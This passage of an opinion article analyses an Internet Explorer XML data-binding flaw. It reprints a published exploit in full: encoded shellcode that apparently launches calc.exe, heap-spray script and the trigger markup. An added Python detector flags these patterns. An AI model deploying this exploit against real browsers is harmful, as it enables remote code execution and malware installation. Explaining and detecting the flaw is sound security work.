
Why the latest IE flaw proves Linux got it right from the start

Opinion and Analysis

This code snippet was published on the exploit web site milw0rm.com and illustrates how the exploit works.

First, some preamble HTML markup.

<html>
<div id="replace">x</div>

<script>

Now the script itself. The shellcode variable holds the machine code the exploit will run; in this sample it starts a process, calc.exe.

Note that I have broken this line up for readability, but you ought to ensure it is one continuous line when pasting it into a text editor:

var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536
%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a
%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe
%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2
%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3
%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81
%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f
%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba
%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e
%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c
%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

The next piece of script code sprays the heap: it grows a string of repeated 0x0a0a bytes to a large size, appends the shellcode, and allocates a hundred copies, so that a jump to the address the exploit later triggers is likely to land inside one of those copies and run on into the shellcode:

var spray = unescape("%u0a0a%u0a0a");

do {
   spray += spray;
} while(spray.length < 0xd0000);

memory = new Array();

for(i = 0; i < 100; i++)
   memory[i] = spray + shellcode;

And here is the exploit trigger; the following XML markup is incorrectly handled by unpatched versions of Internet Explorer and causes it to pass control to an address inside the sprayed memory, and therefore to execute the program instructions placed there.

This too should be one continuous line in a text editor:

xmlcode = "<XML ID=I><X><C><![CDATA[<image
SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C>
</X></XML><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML><XML ID=I></XML><SPAN
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN></SPAN>";

tag = document.getElementById("replace");
tag.innerHTML = xmlcode;

</script>
</html>

Of course, while this example does nothing harmful, it has been noted that the vulnerability has been used to install Trojan horse programs elsewhere.
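As an added example (not code from the article or from milw0rm), the following Python script applies defender-side heuristics to page source, flagging the three features walked through above: a long %u-encoded blob passed to unescape(), a string that doubles itself past a large bound, and the XML data-binding tag pair. The two sample pages are constructed for the example, with the shellcode truncated.

```python
import re

# Indicators for the shape of exploit page described in the article.
UNESCAPE_BLOB = re.compile(r'unescape\s*\(\s*"((?:%u[0-9a-fA-F]{4}\s*)+)"\s*\)')
SELF_DOUBLING = re.compile(r'(\w+)\s*\+=\s*\1\b')          # spray += spray
SPRAY_BOUND = re.compile(r'\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)')
DATA_BINDING = re.compile(r'DATASRC=#\w+\s+DATAFLD=\w+\s+DATAFORMATAS=HTML', re.I)
ENCODED_ADDR = re.compile(r'(&#x[0-9a-f]{4};){2,}', re.I)  # &#x0a0a;&#x0a0a;

def scan_html(text):
    """Return the indicators found in an HTML/JS page plus a simple verdict."""
    blobs = UNESCAPE_BLOB.findall(text)
    units = sum(len(re.findall(r'%u', b)) for b in blobs)   # UTF-16 units decoded
    bound_match = SPRAY_BOUND.search(text)
    bound = int(bound_match.group(1), 0) if bound_match else 0
    # A self-doubling string grown past 64K code units is the classic spray shape
    heap_spray = bool(SELF_DOUBLING.search(text)) and bound >= 0x10000
    binding = bool(DATA_BINDING.search(text))
    encoded_addr = bool(ENCODED_ADDR.search(text))
    score = sum([units >= 32, heap_spray, binding, encoded_addr])
    return {
        "unescape_units": units,
        "heap_spray": heap_spray,
        "spray_bound": bound,
        "xml_data_binding": binding,
        "encoded_address_chars": encoded_addr,
        "score": score,
        "verdict": "suspicious" if score >= 2 else "clean",
    }

# Constructed sample following the article's snippet; shellcode truncated to 8 units.
SAMPLE_EXPLOIT = '''<html><div id="replace">x</div><script>
var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4");
var spray = unescape("%u0a0a%u0a0a");
do { spray += spray; } while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++) memory[i] = spray + shellcode;
xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
document.getElementById("replace").innerHTML = xmlcode;
</script></html>'''

# Constructed benign page: uses unescape() and an array, but none of the other shapes.
SAMPLE_BENIGN = '''<html><script>
var greeting = unescape("%u0048%u0069");
var items = new Array(); for (i = 0; i < 10; i++) items[i] = greeting + i;
document.getElementById("out").innerHTML = items.join(",");
</script></html>'''

if __name__ == "__main__":
    print(scan_html(SAMPLE_EXPLOIT))
    print(scan_html(SAMPLE_BENIGN))
```

The blob-length threshold is deliberately low here because the sample shellcode is truncated; the article's full string decodes to many more units.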

Microsoft offers instructions on how to mitigate the effectiveness of this vulnerability and, in so doing, indirectly espouses the Linux viewpoint on secure computing. Let me explain.
